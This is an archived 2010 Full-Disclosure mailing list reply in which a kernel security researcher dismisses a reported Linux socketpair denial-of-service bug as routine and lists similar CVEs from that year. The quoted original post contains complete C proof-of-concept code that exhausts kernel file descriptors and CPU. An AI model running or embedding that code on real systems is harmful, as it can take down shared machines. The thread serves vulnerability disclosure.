lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <AANLkTikTMC0pr0epD+dUsdDRDvJ5ELK5NYW2kOY5tA7W@mail.gmail.com>
Date: Fri, 26 Nov 2010 11:12:51 -0500
From: Dan Rosenberg <dan.j.rosenberg@...il.com>
To: Key Night <key.night@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Simple kernel attack using socketpair. easy,
 100% reproductiblle, works under guest. no way to protect :(

It's funny to me that this should get special attention over any of
the several dozen local DoS vulnerabilities that have been made public
this year, starting with:

CVE-2010-2954: NULL pointer dereference in IRDA
CVE-2010-2960: NULL pointer dereference in keyctl
CVE-2010-3066: NULL pointer dereference in io_submit_one()
CVE-2010-3080: double free in oss
CVE-2010-3086: kernel panic in futex handling
CVE-2010-3442: non-exploitable heap corruption in sound/core
CVE-2010-4163: OOM-killer invocation in block layer
CVE-2010-4164: kernel panic in block layer
CVE-2010-4175: out-of-bounds read in RDS
CVE-2010-4161: deadlock in socket filters
CVE-2010-4243: 64-bit OOM trigger

The fix for this one is already committed or in the process of being
worked on, if it's indeed a separate issue from the similar unix
socketpair issue that was reported a couple days ago
(http://marc.info/?l=linux-kernel&m=129055087923940&w=2), which is
unclear at this time.

In short: nothing especially out of the ordinary to see here.

-Dan

On Fri, Nov 26, 2010 at 9:58 AM, Key Night <key.night@...glemail.com> wrote:
> Simple kernel attack using socketpair. easy, 100% reproductiblle, works
> under guest. no way to protect :(
>
> Simple kernel attack using socketpair. easy, 100% reproductiblle,
> works under guest. no way to protect :(
>
>
>
> See source attached.
>
> Process become in state 'Running' but not killalble via kill -KILL.
>
> eat 100% CPU, eat all available internal  file descriptors  in kernel :(
>
> --
> Segmentation fault
>
>
> #include <sys/socket.h>
> #include <sys/un.h>
>
> static int send_fd (int unix_fd, int fd)
> {
>   struct msghdr msgh;
>   struct cmsghdr *cmsg;
>   char buf[CMSG_SPACE (sizeof (fd))];
>   memset (&msgh, 0, sizeof (msgh));
>
>
>   memset (buf, 0, sizeof (buf));
>
>   msgh.msg_control = buf;
>   msgh.msg_controllen = sizeof (buf);
>
>   cmsg = CMSG_FIRSTHDR (&msgh);
>   cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
>   cmsg->cmsg_level = SOL_SOCKET;
>
>
>   cmsg->cmsg_type = SCM_RIGHTS;
>
>   msgh.msg_controllen = cmsg->cmsg_len;
>
>   memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
>   return sendmsg (unix_fd, &msgh, 0);
> }
>
> int main ()
> {
>
>   int fd[2], ff[2];
>
>   int target;
>   if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
>     return 1;
>   for (;;)
>   {
>     if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
> 	return 2;
>     send_fd (ff[0], fd[0]);
>     send_fd (ff[0], fd[1]);
>
>
>     close (fd[1]);
>     close (fd[0]);
>     fd[0] = ff[0];
>     fd[1] = ff[1];
>   }
> }
>
> Source: http://lkml.org/lkml/2010/11/25/8
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ